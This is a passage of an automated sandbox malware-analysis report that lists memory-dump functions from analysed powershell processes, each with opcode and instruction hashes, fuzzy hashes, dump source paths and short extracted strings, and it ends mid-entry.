                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_7ffaac3a0000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 30cfc4c754c6e3eb579eb302039734a19d9734d468819d347630dca24fdc092a
                        • Instruction ID: 8cc54f7bbb858b2d2ef9fb92446affc3c222e546fc6527c73f7d77111fed8d5c
                        • Opcode Fuzzy Hash: 30cfc4c754c6e3eb579eb302039734a19d9734d468819d347630dca24fdc092a
                        • Instruction Fuzzy Hash: 25B1D470508A8D8FEB68DF28D855BE97BE1FF55310F04826EE84DC7292CA359944CBC2
                        Function 00007FFAAC479E2A Relevance: .3, Instructions: 252COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.1474412873.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_7ffaac470000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 354d3f07f3ae4777aec71b5a7c23f4789a209377dbaff86499fe96d3c97d90cf
                        • Instruction ID: 0ee428d3b52e55315684059467ba297c7a3d45db19989ba0f38fbfad11c0cb05
                        • Opcode Fuzzy Hash: 354d3f07f3ae4777aec71b5a7c23f4789a209377dbaff86499fe96d3c97d90cf
                        • Instruction Fuzzy Hash: 6771156290E7D58FE7569B7888555A8BFE0EF63225B0841FBD08DCB0E3D9189809C396
                        Function 00007FFAAC479527 Relevance: .2, Instructions: 233COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.1474412873.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_7ffaac470000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2e47b569e2ab62b3d19361ae0f9f5646b5640711b9bbce276d93ddcc9a597692
                        • Instruction ID: 1a3f1346185b1b6076c776c84b16f708b1d68e873e6403522a0de077f0ed8dcb
                        • Opcode Fuzzy Hash: 2e47b569e2ab62b3d19361ae0f9f5646b5640711b9bbce276d93ddcc9a597692
                        • Instruction Fuzzy Hash: E761156290EBD58FF795DB6888595647FE0EF67314B0841FED08DC7093D9189C49C385
                        Function 00007FFAAC479660 Relevance: .1, Instructions: 134COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.1474412873.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_7ffaac470000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 25c6b1c50dcf76f62add8dbdf5d46dc9b7f73c76b14ed13fe26b6611e586fb08
                        • Instruction ID: 469f00647989aa83c24c6fc0a8bf8410c855cb55b1686ead05d4e7b4421e3eed
                        • Opcode Fuzzy Hash: 25c6b1c50dcf76f62add8dbdf5d46dc9b7f73c76b14ed13fe26b6611e586fb08
                        • Instruction Fuzzy Hash: B641F56190EBC58FFB96DB6888995757FE0EF67214B0841FED04DCB0A3D9189C0AC791
                        Function 00007FFAAC475542 Relevance: .1, Instructions: 114COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.1474412873.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_7ffaac470000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: fd2e73000069e34976acf80e33f0a126d406c1b01fc5043992738e875cebe9a5
                        • Instruction ID: 9f243f07f5b021b2a526b8f32ed66300b8c18c21ad4eea20199a04bb576a3937
                        • Opcode Fuzzy Hash: fd2e73000069e34976acf80e33f0a126d406c1b01fc5043992738e875cebe9a5
                        • Instruction Fuzzy Hash: 87315E62D1FBE78FFB9597A85819478AAC1EF43264B5841FAD44DCB0D7DD089C0883C5
                        Function 00007FFAAC474604 Relevance: .1, Instructions: 100COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.1474412873.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_7ffaac470000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 92e091c3337744c451ac314132319efbceed91e9e0059348d279f3e50a8a348a
                        • Instruction ID: 530b541f1fab534772781daa9f3cf50aff2c820e1ad3c7cdd43a021cbbb876b0
                        • Opcode Fuzzy Hash: 92e091c3337744c451ac314132319efbceed91e9e0059348d279f3e50a8a348a
                        • Instruction Fuzzy Hash: 12214B22E1EB568FF3A5972C4849574A6C1EF92314B4851BDD00DC31E3ED1CEC0D8AC9
                        Function 00007FFAAC3AB734 Relevance: .1, Instructions: 92COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.1472997785.00007FFAAC3A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_7ffaac3a0000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 37b48ad8fbe0ff010cc23b82b8e7630564144ec67cca32f040c7b997fec6a5ee
                        • Instruction ID: 058f9a31ebba4b56f81e325b6c2d7097d81aef076e2c4854b07d990cc3462e31
                        • Opcode Fuzzy Hash: 37b48ad8fbe0ff010cc23b82b8e7630564144ec67cca32f040c7b997fec6a5ee
                        • Instruction Fuzzy Hash: 49314530819A4DCEFBB49F14CC45FF972D4FF42718F805539D40D86082DA7AA9A9CB61
                        Function 00007FFAAC479C7D Relevance: .1, Instructions: 74COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.1474412873.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_7ffaac470000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 08f03aa653ac05c5b7a7189fea9dcb981d9bc0a89baecbaddcfa04eef31765fb
                        • Instruction ID: eb670ca9821bed6c297db6d0fbf187f04ec9ecd4f2c91da92f7e8b7117f76d1d
                        • Opcode Fuzzy Hash: 08f03aa653ac05c5b7a7189fea9dcb981d9bc0a89baecbaddcfa04eef31765fb
                        • Instruction Fuzzy Hash: E22104A2A0E7954FFB65AB688C561A8BBE1FF56214F0840FEE08DC7093DD1958488386
                        Function 00007FFAAC477ACB Relevance: .1, Instructions: 61COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.1474412873.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_7ffaac470000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ba332588c993d9ceff8d9a1049ad6e94283e9de4506d5099bcaf7f9962dca077
                        • Instruction ID: c930f8ea5872817789ae05c4b0132b242ececa1e5b07432698a5e5b99f3a5052
                        • Opcode Fuzzy Hash: ba332588c993d9ceff8d9a1049ad6e94283e9de4506d5099bcaf7f9962dca077
                        • Instruction Fuzzy Hash: 3A11E061A0EA969FFB96E76888598656BD1DF1221434804EAD44ECB0D3D808DC0883D1
                        Function 00007FFAAC3A41E5 Relevance: .0, Instructions: 49COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.1472997785.00007FFAAC3A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_7ffaac3a0000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d3018d185270f09d679e4fb71a88b6ef8450c789612176cac0f9877b3821b575
                        • Instruction ID: 0335bd7f8e74065528611e66a9a28cecd7abc0036066c2613fc6e17d774308b7
                        • Opcode Fuzzy Hash: d3018d185270f09d679e4fb71a88b6ef8450c789612176cac0f9877b3821b575
                        • Instruction Fuzzy Hash: EE01A77111CB0C8FD744EF0CE051EA5B3E0FB99320F10052EE58AC3661DA36E882CB41
                        Function 00007FFAAC4774EA Relevance: .0, Instructions: 37COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.1474412873.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_7ffaac470000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: bed42bc92b4403671d91c53783f864e290e9609d956ccac379533b3de2a54887
                        • Instruction ID: 0cecf8ecebc7c4970385b1856e2663d6991b5c5bde25bdd12c88fe966014ccc7
                        • Opcode Fuzzy Hash: bed42bc92b4403671d91c53783f864e290e9609d956ccac379533b3de2a54887
                        • Instruction Fuzzy Hash: 63F0E533A1CA0D8FF386976C540A5F5B3C2DFC5136B658277C14EC3552ED15D80A4284
                        Function 00007FFAAC4778A9 Relevance: .0, Instructions: 30COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.1474412873.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_7ffaac470000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 140ac08fe9b10b02d02df76645af0fc28f8d8bb5f29493b4fe82402f93fdbb95
                        • Instruction ID: fadacdb280ec09d73d9214d64362a6005d0ffba5ab6ab1e4e0f4e21b96f63bf2
                        • Opcode Fuzzy Hash: 140ac08fe9b10b02d02df76645af0fc28f8d8bb5f29493b4fe82402f93fdbb95
                        • Instruction Fuzzy Hash: 3FE0D873B1DB198BFB49575CA8120FCB3D1DF81120784547FD14EC2453E81AA81E4284

                        Executed Functions

                        Function 048AF340 Relevance: 1.5, Strings: 1, Instructions: 281COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2319913941.00000000048A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_48a0000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID: \VTk
                        • API String ID: 0-3424198020
                        • Opcode ID: 0c6065481dae3984c783c3f55835acc360ffee0a324a02aea27090ee318713a6
                        • Instruction ID: e3eee71611ec77d6337948523626b559a06683436aa22efaa839bc016e00f687
                        • Opcode Fuzzy Hash: 0c6065481dae3984c783c3f55835acc360ffee0a324a02aea27090ee318713a6
                        • Instruction Fuzzy Hash: 26B16170E00209CFEB14CFA9D8857DDBBF2AF48314F148A29DA15E7254EBB4A851CF81
                        Function 048AFC10 Relevance: .3, Instructions: 266COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2319913941.00000000048A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_48a0000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 1a5cf37c6d762beabff035ffac5ef7f0494290e9541d0c2c854f3d2c46dc3cbe
                        • Instruction ID: f8129fcad30e9e03f0e29bbccd0d549bd2537532337722c500a84a5d9a139d62
                        • Opcode Fuzzy Hash: 1a5cf37c6d762beabff035ffac5ef7f0494290e9541d0c2c854f3d2c46dc3cbe
                        • Instruction Fuzzy Hash: D3B17671E00209CFEF14CFA9D8857DDBBF2AF48314F148A29DA15E7254EBB4A855CB81
                        Function 07367E08 Relevance: 23.2, Strings: 18, Instructions: 696COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2340973182.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_7360000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID: 4'q$4'q$4'q$4'q$4'q$4'q$tPq$tPq$$q$$q$$q$$q$$q$$q$$q$$q$$q$$q
                        • API String ID: 0-855738717
                        • Opcode ID: b77dfc46fc54ac23f71d0b0bfed8a5232e289757a1fe6efda149329ad93a3e27
                        • Instruction ID: 838339ba43791273e9c3fd36aed726381e57feacf4556f0d3423042de6f88983
                        • Opcode Fuzzy Hash: b77dfc46fc54ac23f71d0b0bfed8a5232e289757a1fe6efda149329ad93a3e27
                        • Instruction Fuzzy Hash: B6325CF1B00306CFEB258B69D4187EABBE6AF89210F14C06AD949CB259DB31DC41C7A1
                        Function 07362AC8 Relevance: 18.1, Strings: 14, Instructions: 579COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2340973182.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_7360000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID: 4'q$4'q$4'q$4'q$4'q$4'q$tPq$tPq$$q$$q$$q$$q$$q$$q
                        • API String ID: 0-1185439275
                        • Opcode ID: 0e72d88246e4dc12c190ac463013cdaf6f75fa741ab62c8d3fa216dcc9ecf968
                        • Instruction ID: 9698e52ad0f08483351863be936671e094e2e9542409acedb432ec6ecf638c0a
                        • Opcode Fuzzy Hash: 0e72d88246e4dc12c190ac463013cdaf6f75fa741ab62c8d3fa216dcc9ecf968
                        • Instruction Fuzzy Hash: B2125BB1B04306CFE7259B29981866BBBF5FF86211F19C0ABD849CF259DB31C846C761
                        Function 07365D48 Relevance: 13.5, Strings: 10, Instructions: 1045COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2340973182.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_7360000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID: 4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$tPq$tPq
                        • API String ID: 0-3075684691
                        • Opcode ID: 3a751ed8d5232bfc034c0d7ca327450b3ead556b96cfc08ad9637daf55331a29
                        • Instruction ID: 91e9213d15505a5abc9d0ea7e91228c95b9e29562f61a1207ca15f326ab8e4cd
                        • Opcode Fuzzy Hash: 3a751ed8d5232bfc034c0d7ca327450b3ead556b96cfc08ad9637daf55331a29
                        • Instruction Fuzzy Hash: 6292B6B0A01215DFEB24DB64C859B9ABBB2BF85304F14C56AD9099F749CB31EC81CB91
                        Function 07367828 Relevance: 7.8, Strings: 6, Instructions: 339COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2340973182.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_7360000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID: 4'q$4'q$4'q$4'q$4'q$4'q
                        • API String ID: 0-1794337482
                        • Opcode ID: ee2d2c32e54ff929cd71bf95a2210a4e826bf32a1c58f941903b248af21e2696
                        • Instruction ID: 36e986002806927dee87f06f0c236f98a44c3614e3771e220ecde6607c3a8fa1
                        • Opcode Fuzzy Hash: ee2d2c32e54ff929cd71bf95a2210a4e826bf32a1c58f941903b248af21e2696
                        • Instruction Fuzzy Hash: 5FD190B0A002099FEB14DB64C458B9EBBB7BF89304F64C519D9056F799CB71EC42CBA1
                        Function 07369F28 Relevance: 5.6, Strings: 4, Instructions: 584COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2340973182.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_7360000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID: 4'q$4'q$4'q$4'q
                        • API String ID: 0-4210068417
                        • Opcode ID: 8b2935e2df6307115a9a617d1668fba5a39a55c727562125f3aad7d3b7140dba
                        • Instruction ID: 48d88fb00ae687e7a5ffd82b7af1ca3fa14f88a48c521ccb22ed0c49d150e2a4
                        • Opcode Fuzzy Hash: 8b2935e2df6307115a9a617d1668fba5a39a55c727562125f3aad7d3b7140dba
                        • Instruction Fuzzy Hash: 3D1270F1B043158FE7159B7884197AB7BA6AFC2211F14C07AD909EF689DB32DC81C7A1
                        Function 07368718 Relevance: 4.0, Strings: 3, Instructions: 294COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2340973182.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_7360000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID: 4'q$4'q$$q
                        • API String ID: 0-3927140803
                        • Opcode ID: 773c8f2bc573d2e88cdcc22de6122fde7573c304d1776e2d05ae0a9c8e66a364
                        • Instruction ID: 33ede9b3fa5965098952157355748f6560cc187f73708606398604cdce5a7156
                        • Opcode Fuzzy Hash: 773c8f2bc573d2e88cdcc22de6122fde7573c304d1776e2d05ae0a9c8e66a364
                        • Instruction Fuzzy Hash: DDA16EB07043058FE7258B7484197EA7BE2AF8E214F14C46AD949CF799DA35EC81C7A2
                        Function 0736780A Relevance: 4.0, Strings: 3, Instructions: 289COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2340973182.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_7360000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID: 4'q$4'q$4'q
                        • API String ID: 0-3126650252
                        • Opcode ID: 11ff8980aa7cb65f0bc6663fcb05d66285b39a1cc6252385caab7cac914f3ac7
                        • Instruction ID: 9f9dcc2b168741e1526f6efc8e3249b219d31aa0266f5fc0e82ef669b92551f9
                        • Opcode Fuzzy Hash: 11ff8980aa7cb65f0bc6663fcb05d66285b39a1cc6252385caab7cac914f3ac7
                        • Instruction Fuzzy Hash: 6BB19FB0A002059FEB14DF54C458B9EBBB2FF89308F64C419D9056F759CB75E886CBA1
                        Function 07360B48 Relevance: 3.9, Strings: 3, Instructions: 124COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2340973182.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_7360000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID: $q$$q$$q
                        • API String ID: 0-3067366958
                        • Opcode ID: 7ba7f2615d1670ed85e9ca002ea569f2d5395bd4ffb59ebdfac4e58782ab3b74
                        • Instruction ID: 62c61990c6ccac926d6a5aba5d4fc69bb17d509fc6bcccadb6ac5e44ccb74f05
                        • Opcode Fuzzy Hash: 7ba7f2615d1670ed85e9ca002ea569f2d5395bd4ffb59ebdfac4e58782ab3b74
                        • Instruction Fuzzy Hash: F3416DF2B002168FEB285B699846BAAF7E5FF84214B14C13ADC59EB344DB31D901C7E4
                        Function 0736675B Relevance: 2.9, Strings: 2, Instructions: 395COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2340973182.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_7360000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID: 4'q$4'q
                        • API String ID: 0-1467158625
                        • Opcode ID: ea32bfba09aec281317f177c9d989ee41efcf8fa1886dcf6d6e25e1bcd8cf190
                        • Instruction ID: 1df79ff900368df5cac69e0d290e50724f4a7e56cc0a972435e421b997501e01
                        • Opcode Fuzzy Hash: ea32bfba09aec281317f177c9d989ee41efcf8fa1886dcf6d6e25e1bcd8cf190
                        • Instruction Fuzzy Hash: 4BF1AFB0A01214DFE724DF54C855BAABBB2BF84340F10C4A9D909AF795CB71ED868F91
                        Function 048AF97D Relevance: 2.7, Strings: 2, Instructions: 182COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2319913941.00000000048A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_48a0000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID: \VTk$\VTk
                        • API String ID: 0-2375230956
                        • Opcode ID: d8ea953607d8ce030675b2418d7058cb81fdace41a7238ed6027006a0832ea7f
                        • Instruction ID: 1d94ade3be14e4ebc7fa105f76ac921027e26edf0c9ac8d81057c416d18eb29d
                        • Opcode Fuzzy Hash: d8ea953607d8ce030675b2418d7058cb81fdace41a7238ed6027006a0832ea7f
                        • Instruction Fuzzy Hash: 7A717E70E00209DFEB14CFA9C8847DDBBF1AF48314F148629E615E7254EBB4A896CB91
                        Function 048AF988 Relevance: 2.7, Strings: 2, Instructions: 180COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2319913941.00000000048A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_48a0000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID: \VTk$\VTk
                        • API String ID: 0-2375230956
                        • Opcode ID: 5da176e81479c17176b83d287b5d2d99a80504f52cb35b4e82cfdca04aef01f4
                        • Instruction ID: dca3ce151fad79c08e44816d2848629d392ff72c3deb50ade8aaef0971674ae0
                        • Opcode Fuzzy Hash: 5da176e81479c17176b83d287b5d2d99a80504f52cb35b4e82cfdca04aef01f4
                        • Instruction Fuzzy Hash: B3716171E00209DFEF14DFA9C8817DDBBF2AF88314F148629D615E7254EBB4A856CB81
                        Function 07360B28 Relevance: 2.6, Strings: 2, Instructions: 76COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2340973182.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_7360000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID: $q$$q
                        • API String ID: 0-3126353813
                        • Opcode ID: 9b18375fcff500f01682ed01ccd1a24406639034f8e94065ff56fb433328f55f
                        • Instruction ID: f99feb64002a49457aa29bf06416b6e3ca756142b9ac1e4dab3246c22b67b03f
                        • Opcode Fuzzy Hash: 9b18375fcff500f01682ed01ccd1a24406639034f8e94065ff56fb433328f55f
                        • Instruction Fuzzy Hash: A22128F59043569FEB2A8F649846A65BFF4EF46214719C19ADC8CEB209D230D900C7A5
                        Function 048AF334 Relevance: 1.5, Strings: 1, Instructions: 288COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2319913941.00000000048A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_48a0000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID: \VTk
                        • API String ID: 0-3424198020
                        • Opcode ID: 51fcb2ee6f4967fd920e314e00b7270685970aab0df59f7ee038ac178fad4a5c
                        • Instruction ID: 94f8b37746bf1405fe84274c66998c6a86fe21a418f327f726762e4919b844e1
                        • Opcode Fuzzy Hash: 51fcb2ee6f4967fd920e314e00b7270685970aab0df59f7ee038ac178fad4a5c
                        • Instruction Fuzzy Hash: 09B16071E00209CFEB20CFA9D8857DDBBF1AF48314F148A29DA15E7254EBB4A855CF81
                        Function 073686FC Relevance: 1.4, Strings: 1, Instructions: 138COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2340973182.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_7360000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID: 4'q
                        • API String ID: 0-1807707664
                        • Opcode ID: 935f655675121efc453dcafc3127cf87a7895b1c013451f047f805754cbc4ded
                        • Instruction ID: 1bd645d68e22587ca2dae52708967486c68a54cce25cb2e244a3e132100ce09d
                        • Opcode Fuzzy Hash: 935f655675121efc453dcafc3127cf87a7895b1c013451f047f805754cbc4ded
                        • Instruction Fuzzy Hash: CF41F6F1B10302CFEB248E24D55C7EA7BE6AF8D604F18C065D9089B669E735DD80C7A6
                        Function 048AC3D4 Relevance: 1.3, Strings: 1, Instructions: 78COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2319913941.00000000048A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_48a0000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID: ITk
                        • API String ID: 0-1352898489
                        • Opcode ID: 5f9e6b29e9befb256d0e8a7871ffeebbffd9dcb0287fdaaa0028ae8cdfa4c7cb
                        • Instruction ID: c3a1284dd5c637c3c679fb987a9117ba8fc8f38de191660b16a2cacf4210f1e9
                        • Opcode Fuzzy Hash: 5f9e6b29e9befb256d0e8a7871ffeebbffd9dcb0287fdaaa0028ae8cdfa4c7cb
                        • Instruction Fuzzy Hash: 40317030B012188FEB26AB34C854BEEB7B2AF89308F0045E9D5099B355DF799E41CF85
                        Function 073652C0 Relevance: .7, Instructions: 706COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2340973182.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_7360000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 33559dd42dd785d30a9484219cb0ba7bc5d5285d9965298cd8485d7dea2e56fc
                        • Instruction ID: cb77a24d317b1b20502a34300a7d0f369b198b2037ceabe1841c978ea660727f
                        • Opcode Fuzzy Hash: 33559dd42dd785d30a9484219cb0ba7bc5d5285d9965298cd8485d7dea2e56fc
                        • Instruction Fuzzy Hash: E4525CB4B00205DFEB14CB58C558B9ABBB2BF89314F24C069D9199F759CB72EC82CB51
                        Function 073652A3 Relevance: .5, Instructions: 528COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2340973182.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_7360000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b9528c0c297b73f5815fffc088b53fce14f87b82fb20365131f7232dc1ae38a9
                        • Instruction ID: 11eb16edbb181f096c1906cef6d34d800fb2230619c7d7ec5701a431c35b6c59
                        • Opcode Fuzzy Hash: b9528c0c297b73f5815fffc088b53fce14f87b82fb20365131f7232dc1ae38a9
                        • Instruction Fuzzy Hash: C5225BF4A00205DFEB14CF58C598A99BBB2FF89314F24C0A9D919AB759C732EC46CB51
                        Function 048AAAB8 Relevance: .5, Instructions: 501COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2319913941.00000000048A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_48a0000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: bd050ec9be43b96224c5178883baf4f25021d88c879167bf0ba3f0ef7552e71c
                        • Instruction ID: a849d4ac5b9f579c5ed816c90d95d18f308a364f0f134f7bca8c481f9e8623ff
                        • Opcode Fuzzy Hash: bd050ec9be43b96224c5178883baf4f25021d88c879167bf0ba3f0ef7552e71c
                        • Instruction Fuzzy Hash: 15221934E01208DFEB19CFA8D484A9DFBF2BF88314F248559E805AB751D775AC56CB90
                        Function 048A2FF0 Relevance: .5, Instructions: 465COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2319913941.00000000048A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_48a0000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ea1968ccc90537e62717eb541691f927e321ff08cdb3ae29bba59f6fb7df4adb
                        • Instruction ID: 405f2a46e506e43dce9af057539611b41835fe201b7c16fa27da1a14669835ce
